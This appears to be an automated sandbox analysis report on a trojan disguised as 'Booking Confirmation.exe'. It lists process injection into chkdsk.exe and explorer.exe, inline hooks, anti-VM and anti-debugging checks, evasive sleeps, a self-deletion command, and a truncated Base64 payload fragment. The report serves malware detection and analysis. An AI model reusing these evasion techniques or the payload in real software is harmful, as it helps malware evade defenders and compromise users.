Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, LogIn.cs	Base64 encoded string: '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

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/1@4/3

Creates files inside the user directory

Source: C:\Users\user\Desktop\Booking Confirmation.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Booking Confirmation.exe.log

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Mutant created: \Sessions\1\BaseNamedObjects\YvCWoKEDmRL

PE file has an executable .text section and no other executable section

Source: Booking Confirmation.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

SQL strings found in memory and binary data

Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Sample is known by Antivirus

Source: Booking Confirmation.exe

ReversingLabs: Detection: 33%

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\Booking Confirmation.exe 'C:\Users\user\Desktop\Booking Confirmation.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
Source: unknown	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
Source: unknown	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\Booking Confirmation.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a COM descriptor data directory

Source: Booking Confirmation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Booking Confirmation.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: chkdsk.pdbGCTL source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Booking Confirmation.exe, chkdsk.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: Booking Confirmation.exe, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00417867 push edx; retf		5_2_00417869
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041B124 push 423E369Ah; iretd		5_2_0041B12B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00416625 push ds; retf		5_2_00416626
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CEB5 push eax; ret		5_2_0041CF08
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CF6C push eax; ret		5_2_0041CF72
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041DF6E push ds; ret		5_2_0041DF77
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CF02 push eax; ret		5_2_0041CF08
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CF0B push eax; ret		5_2_0041CF72
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00410FA6 push ebx; ret		5_2_00410FA7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018BD0D1 push ecx; ret		5_2_018BD0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D3D0D1 push ecx; ret		8_2_04D3D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04336625 push ds; retf		8_2_04336626
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CEB5 push eax; ret		8_2_0433CF08
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CF02 push eax; ret		8_2_0433CF08
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CF0B push eax; ret		8_2_0433CF72
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433DF6E push ds; ret		8_2_0433DF77
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CF6C push eax; ret		8_2_0433CF72
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04330FA6 push ebx; ret		8_2_04330FA7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04337867 push edx; retf		8_2_04337869
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433B124 push 423E369Ah; iretd		8_2_0433B12B

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 7.4686220922

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking Confirmation.exe PID: 7100, type: MEMORY
Source: Yara match	File source: 0.2.Booking Confirmation.exe.26148e8.1.raw.unpack, type: UNPACKEDPE

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Booking Confirmation.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Booking Confirmation.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Booking Confirmation.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 00000000043298E4 second address: 00000000043298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000004329B5E second address: 0000000004329B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Booking Confirmation.exe TID: 7104	Thread sleep time: -100831s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe TID: 7124	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 616	Thread sleep count: 34 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 616	Thread sleep time: -68000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 3296	Thread sleep time: -60000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: Booking Confirmation.exe, 00000000.00000002.677064945.0000000008A0D000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000006.00000000.697485272.000000000FC60000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.693819137.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: k%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.689607624.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.693819137.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Booking Confirmation.exe, 00000000.00000002.671208724.0000000002798000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000002.920996195.0000000004755000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.693941917.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Booking Confirmation.exe, 00000000.00000002.677064945.0000000008A0D000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareRHWAVWDPWin32_VideoControllerB9X921H9VideoController120060621000000.000000-000.9770508display.infMSBDAGST7FLCTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP78EBRXL
Source: Booking Confirmation.exe, 00000000.00000002.671208724.0000000002798000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000006.00000000.693987799.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: k"SOFTWARE\VMware, Inc.\VMware Tools
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188C182 mov eax, dword ptr fs:[00000030h]		5_2_0188C182
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A185 mov eax, dword ptr fs:[00000030h]		5_2_0189A185
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892990 mov eax, dword ptr fs:[00000030h]		5_2_01892990
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E69A6 mov eax, dword ptr fs:[00000030h]		5_2_018E69A6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018961A0 mov eax, dword ptr fs:[00000030h]		5_2_018961A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018961A0 mov eax, dword ptr fs:[00000030h]		5_2_018961A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]		5_2_018E51BE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]		5_2_018E51BE
